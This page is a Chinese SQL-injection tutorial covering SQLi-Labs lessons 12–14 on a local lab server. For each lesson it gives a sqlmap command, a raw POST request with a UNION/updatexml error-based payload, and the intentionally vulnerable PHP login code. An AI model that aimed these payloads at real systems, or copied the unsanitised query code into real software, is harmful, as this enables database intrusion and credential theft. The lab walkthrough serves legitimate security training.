【Mysql sql inject】【入门篇】SQLi-Labs使用 part 2
内容导读
互联网集市收集整理的这篇技术教程文章主要介绍了【Mysql sql inject】【入门篇】SQLi-Labs使用 part 2,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含3990字,纯文字阅读大概需要6分钟。
内容图文
![【Mysql sql inject】【入门篇】SQLi-Labs使用 part 2](/upload/InfoBanner/zyjiaocheng/465/1231cb61d8ac426bb88189760e843bd7.jpg)
3)手工注入
POST /hacker/sqli-labs-master/Less-12/index.php?id=1 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 98 uname=111") UNION ALL SELECT 1,updatexml(1,concat(0x7e,database()),1) #&passwd=111&submit=Submit
4)注入点代码
// take the variables if(isset($_POST[‘uname‘]) && isset($_POST[‘passwd‘])) { $uname=$_POST[‘uname‘]; $passwd=$_POST[‘passwd‘]; //logging the connection parameters to a file for analysis. $fp=fopen(‘result.txt‘,‘a‘); fwrite($fp,‘User Name:‘.$uname."\n"); fwrite($fp,‘Password:‘.$passwd."\n"); fclose($fp); // connectivity $uname=‘"‘.$uname.‘"‘; //双引号闭合 $passwd=‘"‘.$passwd.‘"‘; @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);
- Less-13- Double Injection- String- with twist
1)知识点
主要考察报错注入中的单引号+括号闭合注入情况。
2)工具用法:
sqlmap -u "http://127.0.0.1/hacker/sqli-labs-master/Less-13/index.php" --data "uname=111*&passwd=111&submit=Submit" --current-db --threads 10 --batch --technique BES
3)手工注入
POST /hacker/sqli-labs-master/Less-13/index.php?id=1 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 93 uname=111‘) union select 1,updatexml(1,concat(0x7e,database()),1) #&passwd=111&submit=Submit
4)注入点产生代码
// take the variables if(isset($_POST[‘uname‘]) && isset($_POST[‘passwd‘])) { $uname=$_POST[‘uname‘]; $passwd=$_POST[‘passwd‘]; //logging the connection parameters to a file for analysis. $fp=fopen(‘result.txt‘,‘a‘); fwrite($fp,‘User Name:‘.$uname."\n"); fwrite($fp,‘Password:‘.$passwd."\n"); fclose($fp); // connectivity @$sql="SELECT username, password FROM users WHERE username=(‘$uname‘) and password=(‘$passwd‘) LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);
- Less-14- Double Injection- Double quotes- String
1)工具用法:
sqlmap -u "http://127.0.0.1/hacker/sqli-labs-master/Less-14/index.php" --data "uname=111*&passwd=111&submit=Submit" --current-db --threads 10 --batch --technique BES
2)手工注入
POST /hacker/sqli-labs-master/Less-14/index.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 92 uname=111" union select 1,updatexml(1,concat(0x7e,database()),1) #&passwd=111&submit=Submit
3)注入点产生代码
if(isset($_POST[‘uname‘]) && isset($_POST[‘passwd‘])) { $uname=$_POST[‘uname‘]; $passwd=$_POST[‘passwd‘]; //logging the connection parameters to a file for analysis. $fp=fopen(‘result.txt‘,‘a‘); fwrite($fp,‘User Name:‘.$uname."\n"); fwrite($fp,‘Password:‘.$passwd."\n"); fclose($fp); // connectivity $uname=‘"‘.$uname.‘"‘; $passwd=‘"‘.$passwd.‘"‘; @$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);
【Mysql sql inject】【入门篇】SQLi-Labs使用 part 2
标签:
本文系统来源:http://www.cnblogs.com/17bdw/p/5529025.html
内容总结
以上是互联网集市为您收集整理的【Mysql sql inject】【入门篇】SQLi-Labs使用 part 2全部内容,希望文章能够帮你解决【Mysql sql inject】【入门篇】SQLi-Labs使用 part 2所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。
内容手机端
扫描二维码推送至手机访问。